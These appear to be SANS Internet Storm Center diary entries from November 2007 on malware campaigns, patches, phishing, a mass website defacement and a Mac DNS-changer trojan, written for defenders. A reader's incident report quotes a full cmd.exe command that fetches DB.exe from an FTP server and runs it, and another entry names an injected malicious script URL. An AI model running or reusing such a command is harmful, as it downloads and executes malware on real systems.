Being somewhat cloistered in my job, and having a couple of young advocates at home (my 14 y.o. installed her own stripped-down *nix on her laptop, the 11 y.o. asked for help with his) I don't get to stay on top of the latest Windows and Mac malware detect/remove/recover tools. As a result, while my personal faves are useful to me, they'll no doubt seem too slow/dumb/technical/esoteric/2004 for others.
What is in your holiday jump bag? Let us know at https://isc2.sans.org/contact.html and we'll post the most popular response essentials.
Thinking it over, this sort of makes sense: if you want to trick a user into (voluntarily!) downloading and installing a piece of malware that claims to be a video codec, you probably don't want to scare the user away from the sites that draw him into the spyderweb by having other malware or exploit attempts lighting up the user's anti-virus. The Zlob approach of propagating malware seems to have been quite successful for the bad guys: Not only are they still "going strong" more than a year after the first report, they also branched out to include Mac-OSX (diary) earlier this month.
Since the "codec" binaries change frequently and AV coverage is notoriously poor, the probably best defense in a corporate environment is to have a web filter in place that blocks access to porn pages. What used to be seen as a mere "compliance" measure to not to run afoul of sexual harassment rules at the workplace has long since turned into a cornerstone of most companies' malware defense.
Kind of following on from Swa's post from yesterday. When we go to a banking website we check for the little padlock, when we send a confidential communication we encrypt it. Much of the internet now is dependent on strong encryption. Ecommerce relies on solid encryption, as do governments, businesses, etc. So what if encryption goes bad? Well, at best people laugh at you (remember CSS) at worst national security is compromised, or your company’s reputation is shot to pieces.
Craig (thanks) wrote in with an observation that set me thinking.
“I don’t think there is a single place in a computing system where the architecture and implementation have more critical impact then in implementation of cryptographic systems.”
We all know that if the key is compromised, the game is over. We also tend to think “I’m using AES-256, so everything should be sweet”, but not all of us think about the rest of the system. For example the pseudo-random number generator (PRNG) on Windows issue swa talked about yesterday, shows that if thing aren’t quite as random as you’d hoped, or access can be gained then things go awry and using a strong algorithm means nothing.
As Craig writes
“just because your pieces fit and operate as a cryptographic system, doesn’t mean that you put them together in a way that makes the cryptographic system secure”
Now governments typically have recognised this issue. Many will state that unless the cryptographic product has been fully examined by them, as a government agency, you are not permitted to use it to transmit anything sensitive.
If the architecture to deliver cryptographic services has not been evaluated, then if a recognised strong algorithm it may still be used albeit for limited use. To me it shows that there are governments that have recognised that the way something is put together is very important. This is one area where business needs to catch up. You often hear the words “but it uses insert favourite algorithm here”. In the world today we may need something more.
So how do you get some of this assurance that a product is put together in a secure manner? Many organisations and government look at products that have been evaluated. Typically this is now under a scheme called Common Criteria (CC) (old timers will remember the orange book as well). One of the things to look out for is the security target of the device/software being evaluated. For example there are some firewalls on the list whose security target does not include the VPN or encrypting capabilities. So the firewalling capabilities have been verified, but the encryption functions have not. If you are a business, then this may still be OK to use, but if you are a government agency, it may mean that you will have to purchase a separate product to provide VPN connectivity for remote users.
The devices also need to be configured in line with the Security Target and the Certification report in order to be able to comply. Over time there have been examples where a product is rated as a secure product, but only if you don’t connect it to a network (yes it was a product that provides network functionality). Again government bodies typically have to pay attention to this, business less so, but it is always good to know what has been evaluated and what has not. Also don’t forget that not all versions of the same product will be evaluated. It can be an expensive process so vendors may only have major new versions evaluated.
So next time when a vendor (sorry guys) tells you "this product is rated EAL something", you may want to ask for the relevant certification report and Security Target and have a good read, but still better than nothing.
Mark H - Shearwater
'Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin.'
The title is actually a quote from John Von Neumann. And while it's over half a century old, it is still indicative of the difficulty faced by those that are forced to generate random data.
When I teach a certain awareness course for developers, one of the basic messages is to not to try to reinvent crypto components, but use proven good ones. Basically, it's just way too hard to get it perfectly right for the mere mortals among us.
In crypto you basically have 4 basic building blocks: the symmetric and asymmetric cyphers, the hash functions and the (pseudo) random number generator. With those, you can build whatever you need.
Lately the random number generator in windows seems to be under scrutiny. Basically some crypto researchers are calling it broken and the press reports that Microsoft mostly seems to deny it's a problem.
While it's rather easy to make fun of Microsoft in this, take a look at what Microsoft employees write about PRNGs and the NIST recommendation: http://rump2007.cr.yp.to/15-shumow.pdf.
- The research paper: http://eprint.iacr.org/2007/419.pdf
- Microsoft doesn't seem to have a public statement, but their position boils down to:
- There is no security vulnerability as the information is not leaked.
- The information is actually only released locally to authorized users. E.g. Administrators have wide rights.
- They encourage user to run with limited user rights.
- They seem to be ready for what they call defense in depth (inside one machine) and to reevaluate the strength of their PRNG.
[If a Microsoft spokesperson wants to send me quotable material, feel free ...]
Still security professionals will need to position themselves on the issue in the long run.
What do you think about it, why? Let us know and we'll summarize the best replies we get.
Apple released in the last days upgrades to it's Tiger (10.4) and Leopard (10.5) versions of OS X.
For those unfamiliar with Mac OS X: this isn't just security patches, it somewhat comparable to what Microsoft calls a service pack. As such it can include stability fixes, features, etc. and security fixes.
10.4.11 includes a long list of security fixes. Since it's a all or nothing deal, there's very little real use in discussing all of them individually. Just take the plunge: there are a few bad ones in there, so you'll need it anyway. Some readers wrote us that there might be some issues with it all, so be careful. That said, I'm running it for a bit already and have not seen a single bad thing so far.
10.5.1 includes some security fixes too, all centered around the application firewall:
Apple also released patches for the beta of safari, but hey, it's beta software!
Every day we see new exploits and old, patches and vulnerabilities, DOS and DDOS. As the newest member of the Internet Storm Center, I am in data gathering mode. Even though I have been a GCIH (#50) since 2000, we as handlers have to start learning the incident handling process all over again every time we join a new team. As a new handler, my question was where is the contact list? The first step in the Incident Handling process is preparation, so let’s do it. Let’s get this list updated.
By the way, if you need to know how to prepare for an incident, SANS has great Incident Handling Forms as a part of SCORE (Security Consensus Operational Readiness Evaluation). SCORE is “dedicated to providing a community consensus minimum standard of procedures, and checklists for overall infrastructure security." There is no need to reinvent the wheel, so check out the forms and prepare your team for an incident.
So we ask, if you are on a CIRT team and would like for us to have your team’s contact information in case we see activity you should know about, please send it to us on our contact page. We look forward to hearing from you.
Fair Winds, Mari
Nothing really major happening today, so here are couple of quick items:
- Many security fixes released by Apple today for OS X and Safari on Windows.
- There is more fallout from the salesforce.com breach. This time phishing emails were sent to recipients from the supposed "Canadian Revenue Service" (Canada tax agency).
- There is a fake Microsoft Security Update bulletin going around that looks pretty real. They seem to be customized with the recipient's full name. There is a link to malicious EXE files proclaiming to be the patch installer.
Historically, data was submitted to DShield via e-mail. I choose this method way back (Nov. 2000) as it provided easy load balancing and queuing in case the main database server was under heavy load. Initially, we only had a Linux client, and of course its trivial to send e-mail from almost any linux host. The first client was actually a 1 line shell script.
I think e-mail its still a good idea, but we are having more and more issues getting e-mail to us. In particular our Windows client, cvtwin, uses an external simple command line client which isn't always that easy to configure as ISPs block port 25 and require users to log in to mail servers.
So earlier today, Wayne, our "cvtwin guy", added a new function: It will now submit data via HTTP as well as SMTP. I think in particular in Windows scenarios this makes a lot of sense. Most of our windows users are home users. They run some kind of logging software on a work station and submit logs collected by this software. These systems are used for web browsing and usually have unobstructed access to port 80.
So if you have issues running CVTWIN because you are not able to send mail, give the new version a try. And again: If it works, don't touch it ;-)
More details about CVTWIN:
Changelog (use for now for documentation of the http feature)
This is an experimental release at this point. Please report issues to firstname.lastname@example.org.
Overview of the November 2007 Microsoft patches and their status.
|#||Affected||Contra Indications||Known Exploits||Microsoft rating||ISC rating(*)|
|MS07-061||An input validation failure allows remote code execution. Replaces MS06-045|
|Windows shell - exposed via IE7, skype, acrobat, ...
||Well known problem, exploit in the wild||Critical||PATCH NOW||Important|
|MS07-062||Lack of entropy in pseudo random number generation results in weak transaction IDs and therefore in DNS spoofing vulnerabilities. DNS spoofing can lead to man-in-the-middle attacks and more.
|KB 941672||No publicly known exploits||Important||Critical||Critical(**)|
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
- We use 4 levels:
- PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
- Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
- Important: Things where more testing and other measures can help.
- Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
- The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
- The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
- Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
- All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.
Swa Frantzen -- NET2S
Mike sent us an interesting twist on a phishing scheme. The victim receives a message from a credit union associated in name with the victim receiving the email, and it asks to call the credit union on a provided phone number.
It's well targeted, so we're obfuscating the parts that identify the victim all too easy:
From an awareness point of view to your customers/users/... the key message here is to:
- not only to teach your users not to follow links in (possible) phishing messages, but to use bookmarked URLs instead
- but to also tell them to use only contact data from a safe location (and especially nothing originating directly or indirectly from the email message itself)
We've checked out the phone number itself. When doing this, make sure calls to scam artists don't get traced back to you, they tend to become aggressive every so often. It seems this number is used more in scams like these: http://800notes.com/Phone.aspx/1-877-228-0944.
One of the fellow US based handlers called the number to validate it's not a joe-job to discredit a real institution. He found it's an automated system on the other side and it indeed asks credit card numbers, PIN, expiration date etc. It'll also tell you your card is now activated (read: if you entered valid data they will now use your card actively). Interestingly it doesn't identify the institution it's supposedly working for.
We've received several reports this morning of folks getting SQL errors from WSUS after synchronizing. The error suggests some sort of problem in the new product metadata. One report suggested it might be US only, but some forum postings elsewhere suggest that it might be hitting the UK, too, so I wouldn't count on it being limited geographically. We've pinged our Microsoft contacts, but not heard back from them yet. We'll update as more info becomes available. Thanx to Mark and Dennis for bringing this to our attention.
Juha-Matti reminded us of a new Google cross-site scripting issue related to a recent JAR: protocol vulnerability in Firefox that was reported by Petko D Petkov on Saturday:
Marcus H. Sachs
Director, SANS Internet Storm Center
Marcus H. Sachs
In the news this past week were the ominous stories about a Cyber Jihad on November 11th. OK terrorists, it's November 11th and we haven't seen your little Jihad yet. As Johannes said in his diary a few days ago, it seems to have been called off. What happened? If there are any terrorists hanging out here reading this diary I'd like to hear from you. Please use our contact page.
This whole cyber terrorism thing has always bothered me, especially since every time some nut decides that the "next attack" is going to be against an online target the press goes into hyper alert mode. Folks, let's get serious about this for a few minutes. I know that this is politically incorrect, but the odds of a terrorist group "terrorizing" the Internet with cyber bullets and e-bombs are about as small as the odds of the Morse Code coming back as a primary means of communication. It's not zero, but it's also not much more than zero. (Remember, math fans, that odds are a comparison expression such as 1:20 or 1:100 and can also be expressed as a real number by dividing the first value by the second.) The terrorists use the Internet for the same thing everybody else does - communicating with each other. They also use it to raise money through criminal activity, then launder it via one of the many electronic payment systems. Ever look at the spam and phishing junk mail you receive? It's not just the Russian Business Network operating in the shadows. With the Internet providing near-perfect communications and a seemingly endless supply of money why would a terrorist group want to blow it up?
So for those looking for something to do while we remember our military veterans and fallen comrades in arms today (don't forget today is Armistice Day, also known as Veterans Day or Remberance Day in several countries) think about how a terrorist group might actually go about terrorizing the Internet. Send us your ideas and we'll publish them here. The point is to learn from this exercise, to see what is possible and then to ask what we can do to prevent it or mitigate any consequences should it happen.
Thank You, Veterans, for your service to your country!
Marcus H. Sachs
Director, SANS Internet Storm Center
Previously, we often warn people from visiting unknown/suspicious websites as they could contain malicious content. But nowadays, even visiting known websites, you could be affected. It was reported that the India Times website contains hundreds of malicious files that could infected those visit the website.
Legitimate websites containing malicious content is not something new as it has already happened a couple of times. Web administrators must be prudent to ensure their websites are properly secure. Hackers are now clever enough not to deface your websites to alert you but rather plant malicious content on them and wait for victims. Periodically running a vulnerability scan on your web systems is necessary to avoid known holes. Let us know if you have other good tips for the web admin.
Our reader Oscar shared with us that when he was playing world of warcraft, he suddenly lost control and got some "strange" lines appearing (injected command strings displayed within his WoW session). Below is a screenshot.
As he is also running a VNC server with a fairly easy guess password, this is what he got a couple of files:
If you have encountered similar experience, let us know.
Lesson learnt: If you put any services expose to Internet without proper protection, you are asking for trouble, unless of course you are running a honeypot/honeynet. Thanks Oscar for sharing.
Oscar wrote back and gave us a detailed description of what happened.Â Here is what he said:
So, it was the typical night, me playing WoW at 12:30 in the morning (Central time) and I had just set my hearthstone to Shattrath, which everyone knows is the best spot to set it.
So I was walking back out of the hearth spot, and my character started spinning around in circles, then my charter said "aaaaaaaaa"
then, what looked like code was also spoken by my character "%systemroot%\system32\cmd.exe and then /c echo open ftpd.xbytez.com.ar 21 >> ik &echo user B0t _A159753b >> ik &echo binary >> ik &echo get DB.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik&DB.exe &exit So, This seemed curious, since I wasn't even on a windows platform, so I manually logged into the ftp server, didÂ a mget * and thought the SANS folks would be interested in these files.
Now, how did they get in?Â My guess here is that I had just installed the latest and greatest version of my favorite companies OS, and I turned a feature called Screen sharing, and also X'd the option to allow VNC users to logon with a password.Â Well, the password i picked was pretty guessable.Â When I logged into previously mentioned ftp site, a program there was called vnckiller.exe So i would aseume thats how they got in.Â Lesson for the Day: Even if your turning on a feature for testing purposes, don't choose a easy password, as most likely, you'll forget to turn off this feature, and be rooted.Â Thank goodness I wasn't
A question for our readers:Â has anybody seen this happen to their session in WoW or any other virtual world simulation?
a.b.c.d - - [09/Nov/2007:15:24:35 +0000] "GET /portreportascii.html?date=2007-11-09 HTTP/1.0" 200 500572 "-" "gsa-crawler (Enterprise; S5-FTNF3BWZPUJAS; email@example.com)" "-"
At first, I thought "oh well, its google". But looking at the user agent string closer, reveals some subtle differences. This is a Google search appliance, not the uber-google-bot we all love. The regular Google bot looks like this:
188.8.131.52 - - [09/Nov/2007:15:24:37 +0000] "GET /date.html?port=47109&date=2007-10-25 HTTP/1.1" 200 7538 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
I have seen similar cases a few times now. While this one was not malicious, in some cases attacks used google's (or other search engine) user agent strings. I can only assume that this is an attempt to fit in better, and maybe retrieve a search engine version of the page. If anybody knows a good reference where to find IP address ranges used by certain search engines: let us know.
(and btw... if you need bulk data access to dshield data: Please ask. Spidering the site is just not very efficient and you will run into some anti-harvesting traps sending you in circles)
Johannes B. Ullrich
Chief Research Officer, SANS Technology Institute
As handlers we tend to have a tiny stubborn streak, no really, we are, just ask our respective partners, they’ll confirm it. So in the fine tradition of "I wonder what else is going on" I dug a little bit further.
The more I looked the more familiar it seemed. Remember the Super Bowl infection back in February? Mass defacement, using SQL Injection, downloading a file (although almost everything does that nowadays), script is #.js, etc. It all sounded a bit the same. So was there a link?
Seems there might be at that. There are various sites that will let you have a look and see what other sites are or were hosted on a particular IP address. The address that yl18.net points at shows that other web sites hosted on the same server as yl18.net are:
- · 137wg.com
- · Worldofwarcraftn.com
- · Zj5173.com
When you look at the title of the site 137wg.com you will find a reference to the newasp.com.cn domain (remember ANI?)
Following the yellow brick road on yl18.net you end up adding to the counter hosted in the domain cnzz.com, strangely familiar from both the Super Bowl and ANI issues earlier this year. So it would seem that there may be a link.
The good news so far is that the executable being downloaded seems to be detected by most AV products. The sad news is that when I checked the other day the number of infected sites was about 30K and now about 52K sites.
If you use URL blockers in your organisation, then you may want to block the four domains and your users will be protected for at least the next little while.
Mark H - Shearwater
One of the things I’ve been working on recently included monitoring dropped sessions on an internal firewall. This firewall (along the others) is positioned between an application server and a database server. The firewall allows only incoming connections from ephemeral ports on the application server to port 1521 on the database server (that’s Oracle SQLNET). The following figure shows the setup:
The dropped packets log contained something interesting. From time to time, the firewall dropped some packets coming from the database servers, as shown below:
Source IP:Port Destination IP:Port
This was pretty strange as the database server should never open new connections so I did some further research. I setup two sniffers on both sides and analyzed captured packets. That allowed me to reconstruct what happened here – the example I’m using below shows a session that starts at 10:00AM:
- 10:00 – The application server connect to the database server, port 1521 (SQLNET). Connection is established from an ephemeral port, 31578. The application server starts sending queries following a normal TCP three way handshake.
- 11:00 – The application server sends the last query to the database server which replies with results. The application server sends an empty ACK TCP packet acknowledging that it received this packet.
- 12:00 - One hour after the last packet has been seen in a TCP session, the internal firewall’s timeout causes it to delete this session from its stateful connection table. This means that any future packets pretending to belong to this session will be dropped.
- 13:00 – The database server sends an ACK packet to the application server. This is caused by the TCP keep-alive mechanism as described in RFC 1122. By default, after 2 hours of a session being idle, the OS on the database server sends an ACK packet to see if the remote side is still up. If no answer is received, it exponentially back offs with new ACK packets. After this, it will drop this session.
So, the problem here was caused by the application server not properly closing a session that it doesn’t use any more, and not using TCP keep-alives. It was interesting to see that the application server used the session exactly for 1 hour.
In order to properly fix this we would have to work with the vendor on the application server to see why it stops using connections without closing them. An easier fix was to increase the timeout setting for the stateful connection table on the firewall to 9000 seconds (2.5 hours), of course, after carefully examining the impact of this action on the firewall since it will cause it to use more memory for similar questions. This allowed ACK packets (TCP keep-alives) sent from the database server through the firewall and the application server correctly replied to them.
Why all this you might ask? This was one example of why we should spend time cleaning our local networks as well. During this exercise we found heaps of incorrectly configured servers and/or applications that people lived with for ages, without even knowing what’s going on on the network (low) layer.
Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40 000 pages across the internet:
script src="hXXp://yl 18.net/0.js"
This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.
Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti virus coverage differed greatly between several binaries. Below is the virustotal output for one sample:
AhnLab-V3 2007.11.7.0 2007.11.06 -
AntiVir 184.108.40.206 2007.11.06 TR/PSW.OnlineGames.gul
Authentium 4.93.8 2007.11.05 -
Avast 4.7.1074.0 2007.11.05 -
AVG 220.127.116.113 2007.11.06 PSW.OnlineGames.QCP
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul
ClamAV 0.91.2 2007.11.06 -
DrWeb 4.44.0.09170 2007.11.06 Trojan.PWS.Gamania.5503
eSafe 18.104.22.168 2007.10.28 suspicious Trojan/Worm
eTrust-Vet 31.2.5270 2007.11.05 -
Ewido 4.0 2007.11.06 -
FileAdvisor 1 2007.11.06 -
Fortinet 22.214.171.124 2007.10.19 -
F-Prot 126.96.36.199 2007.11.06 -
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
Ikarus T188.8.131.52 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul
Kaspersky 184.108.40.206 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul
McAfee 5157 2007.11.06 -
Microsoft 1.3007 2007.11.06 -
NOD32v2 2641 2007.11.06 -
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ
Panda 220.127.116.11 2007.11.06 Suspicious file
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence
Rising 20.17.12.00 2007.11.06 -
Sophos 4.23.0 2007.11.06 Mal/Packer
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious
Symantec 10 2007.11.06 Infostealer.Gampass
TheHacker 18.104.22.168 2007.11.06 -
VBA32 22.214.171.124 2007.11.06 -
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul
This type of widespread attack can incur a serious toll and requires follow up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:
- Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
- If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
- We gather samples of the affected malicious code and distribute it to anti virus vendors to have them build coverage;
- If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.
We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.
As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.
This is a problem – most registrars do not really care what a domain is used for. Generally malicious domains are however paid for with fake credit cards, and if this can be identified, they have the legal ability to disable the domain.
These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross site scripting, and are infecting their users.
If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.
Maarten Van Horenbeeck
Apple has released Quicktime 7.3 which contains fixes for a number of serious vulnerabilities:
- A memory corruption bug which can be triggered by a maliciously crafted movie. It could potentially result in arbitrary code execution (CVE-2007-2395).
- A heap overflow in the use of Sample Table Sample Descriptor atoms, which can be triggered through maliciously crafted movie files. It could potentially result in arbitrary code execution (CVE-2007-3750).
- Vulnerabilities in Quicktime for Java which could allow untrusted applets to obtain elevated privileges (CVE-2007-3751).
- Two bugs in PICT file processing, potentially resulting in arbitrary code execution (CVE-2007-4672).
- A bug in QTVR movie file parsing which could result in arbitrary code execution (CVE-2007-4675).
- A bug in the parsing of color table atoms which could result in arbitrary code execution (CVE-2007-4677).
The impact of each bug varies based on the platform, but all of Mac OS X, Vista and XP SP2 are affected. Get more information at Apple.
It appears partial information on the vulnerability and exploit has been in the wild since mid October, and it is being exploited in a limited number of incidents.
According to the advisory, this is a local attack which allows privilege escalation. While plans for an official Microsoft supplied patch are in the works, Macrovision has released an update from their website which allows you to mitigate this issue.
Maarten Van Horenbeeck
- the site calling for it has tried to do so before without success
- November 11th is also the official start of carnival, at least in germany, and a day for hoaxes
- Even if something is going to happen, I doubt it will be more then a lame DoS attack
In the past, political attacks like this resulted in some more or less manual DoS attacks. Expect things like calls for supporters to reload particular "offensive" websites, or use the ping command to flood them. In some cases, supporters may be asked to install trojans. But chances are that the usual criminals will just take advantage of this and use it as a trick to install the regular criminal bots.
Johannes B. Ullrich, Ph.D.
Chief Research Officer, SANS Technology Institute.
A complete list will be presented at the CDI conference in December and we will post it here after the conference.
Johannes B. Ullrich, Ph.D.
Chief Research Officer, SANS Technology Institute
A last minute reminder that in some regions (including the United States, Canada, the Bahamas, Bermuda, and the French territory of Saint Pierre and Miquelon, and likely others that I have missed) the clocks will be set back. See Marc's entry from last week for more details.
Be sure to check your appliances, unpatched computers and PDAs. It's also a good time to change the batteries in your fire/smoke alarms.
DNS name servers that don't forward their requests to other DNS servers, need to know some of the IP addresses of the root name servers in order to find their way to the rest of the information. They either have this knowledge built-in or use an external file containing in initial mapping.
The "L.ROOT-SERVERS.NET" root name server changed its IP address, and hence some updating to the hints could be useful.
For the record: this isn't an urgent update. Consider it an opportunity to verify your name server software is up to date on patches and perhaps to learn a few interesting bits on how the DNS system works.
A local privilege escalation problem in a security product like anti-virus software typically sets of quite some alarms with security people as the software is installed for getting the machines more secure, not less.
Mac versions of Symantec's anti-virus software have a local privilege escalation problem. It allows members of the admin group to gain "root" powers.
Still members of an admin group can use sudo to get a local shell with root powers anyway, hence we're not likely to loose much sleep over this one. That is , until it gets automated in a second stage exploit.
The expected stability update to Firefox is out.
It fixes some known problems in version 126.96.36.199, but nothing flagged as security related.
Funny, stability seems to be like availability. Probably proof quite a few still don't consider availability as an integral part of security ...
Mankind has always had a desparate need to identify its environment. Only by studying our surroundings, we’ve been able to make changes that help us live better. This is also valid for the virtual world we ourselves created.
Complicating matters though, there are multiple parallel maps which essentially cover the same infrastructure, but from different points of view. There are network diagrams, huge maps of the internet and those showing how individual cities interconnect.
At another layer, there are now maps that try to chart how people interrelate – social networks, as we call them. Other maps identify how suspected criminal networks operate or how they structure domains used in specific attacks.
One major issue with maps is that we tend to consider them accurate. When we use maps in our daily lives, they generally show us the way from point A to point B, and they are always right. This is because of a fundamental feedback loop. When I cross from point A to point B, others have likely crossed from point C to point D while meeting the same road. If the map is inaccurate, errors get reported and fixed very smoothly. There’s a lot of traffic, after all.
Our network maps however compare much better to those built hundreds of years ago. They were created by a single person visiting a new region or continent, and contained errors. From 1605 to 1722, for example California was regularly painted on maps as an island.
In addition, maps are often used to sell beliefs. They aren’t necessarily wrong, they just present the world as it exists in the cartographer’s mind. Try grabbing maps of the Spratly Islands from various East Asian countries, or maps of the Middle East from Israel and Syria.
As security professionals, we all meet organizations maintaining network diagrams that do not fully match reality. Their perimeter is not where they thought it was, or various hosts are exposed in ways not fully realized. Making good risk management decisions starts with great asset management, and this requires you to keep your maps up to date. From experience, it appears to me that smaller organizations have problems keeping smaller diagrams up-to-date, while larger organizations have really good detail diagrams for individual solutions, but are lacking insight in their overall, distributed network environment.
Some ways to remediate this:
- Recognize that diagrams may not be accurate by assigning a confidence rating to each of them, and then work to increase confidence through verification;
- Use vulnerability management such as scanning to identify assets. However, always take into account their limitations (discovery can be slow, is always incomplete – even when you scan 65535 ports on a variety of protocols);
- Network IDS can sometimes contribute if you're looking beyond the individual alerts but at overall flows.
I'm very interested in hearing from you on measures you've taken to deal with these issues.
Maarten Van Horenbeeck
On behalf of the volunteer handlers of the SANS Internet Storm Center, I'd like to pass along our deep appreciation to all of the readers who sent in hundreds of comments and ideas during the past month! As promised, below is an index to all of the Cyber Security Awareness Month diaries that were published over the past 31 days. We are working on producing a full document that has all of the submissions (cleaned up, reformatted, and sanitized if needed) that were received. As you can imagine it will be a while before it's ready for downloading due to the volume of information that was sent to us. If you have any final thoughts or want to add some additional tips to the subjects, please send send them to us via our contact form.
1. Establishing a User Awareness Training Program
1 Penetrating the "This Does Not Apply To Me" Attitude
2 Multimedia Tools, Online Training, and Useful Websites
3 Getting the Boss Involved
4 Enabling the Road Warrior
5 Social Engineering and Dumpster Diving Awareness
6 Developing and Distributing Infosec Policies
2. Best Practices
7 Host-based Firewalls and Filtering
8 Anti-Virus, Anti-Spyware, and Other Protective Software
9 Access Controls, Including Wireless, Modems, VPNs, and Physical Access
10 Authentication Mechanisms (Passwords, Tokens, Biometrics, Kerberos, NTLM, Radius)
11 File System Backups
12 Managing and Understanding Logs on the Desktop or Laptop (AV, Firewall, or System Logs)
13 Patching and Updates
3. Hardware/Software Lockdown
14 Data Encryption
15 Protecting Laptops
16 Protecting Portable Media like USB Keys, iPods, PDAs, and Mobile Phones
17 Windows XP/Vista Tips
18 Mac Tips
19 Linux Tips
20 Software Authenticity (Digital Signatures, MD5, etc.)
4. Safe Internet Use
21 Understanding Online Threats, Phishing, Fraud, Keystroke Loggers
22 Detecting and Avoiding Bots and Zombies
23 Using Browsers, SSL, Domain Names
24 Not All Patches Are Released on a Tuesday
25 Using Email, PGP, X509 Certs, Attachments, Instant Messaging and IRC
26 Safe File Swapping
27 Online Games and Virtual Worlds
5. Privacy and Protection of Intellectual Property
29 Insider Threats
30 Blogging and Social Networking
31 Legal Awareness (Regulatory, Statutory, etc.)
Marcus H. Sachs
Director, SANS Internet Storm Center
We received some reports of various companies (http://www.intego.com/news/ism0705.asp) reporting about a Mac DNS changer Trojan in the wild. As I happened to receive a sample of it, I decided to analyze it quickly.
The whole Trojan is relatively simple and works almost exactly the same as its brother for Windows operating systems . In case of execution, the Trojan changes the DNS settings on the machine and reports back to the C&C server.
While the Trojan is relatively simple and not a big threat, two things came to my mind immediately: the bad guys are taking Mac now seriously – this is a professional attempt at attacking Mac systems (and they could have been much more damaging really). The second thing that folks at Sunbelt noticed (http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html) is that when they sent a sample to VirusTotal there were 0 (zero, nada, nilch) products that detected this.
So, let’s see what really happens here. The “social engineering” part has been seen million times – an unsuspecting user visits a web site with a movie on it, however, he needs to download a new codec in order to view it. On Windows, that new codec is typically a PE executable, for Mac the bad guys prepared a DMG archive (DMG files are like ISOs). The user is then prompted to install the package and during this process he will have to supply the administrator credentials. Yep, it’s game over from this point in time (and the attack is exactly the same as on Windows – keep in mind that these users *will* willingly supply these credentials.
Now that we know what happens, let’s see how this whole thing works. I analyzed this on a Linux machine so I first had to convert the DMG file into something Linux can read (an ISO). There is a simple dmg2img utility available from http://vu1tur.eu.org/tools/ that does the job perfectly.
Once you converted the file to an ISO image, you can mount it and see what’s going on. The most important directory is Resources which contains scripts that are executed before and after the installation. The files that get installed are kept in the Archive.pax.gz file – it’s a gzip compressed cpio file.
The preinstall/preupgrade files from the Resources directory get executed immediately after the installation starts (and they do the main job). These two files are just shell scripts which change the DNS server settings on the machine by using the scutil utility. Here’s what they set the DNS servers to:
(Yes, the IP addresses are familiar). The scripts also create a new cronjob that gets executed every minute. The cron job executes a file called plugins.settings, which is just a copy of the preinstall/preupgrade files – it makes sure that the DNS servers stay as those above and that the cronjob is not removed.
Finally, the postinstall/postupgrade scripts execute a Perl script called sendreq. This Perl script collects some information about the local machine (uname –p and hostname), Base64 encodes them and sends the information to the C&C server (188.8.131.52). An interesting thing is that this gets submitted as the Accept-Language: header so it should be easy to write a Snort signature to catch this.
As I said, although the Trojan is really simple, it could have done much worst things (once the installer script has root privileges, it is game over anyway). This malware shows that we must not ignore Mac machines and that Mac users should not think they are invulnerable just by using a Mac and that they can click on absolutely everything.
From the network point of view – pay attention to DNS traffic as any requests that leave your network, and are not from your DNS servers are either coming from infected or misconfigured machines.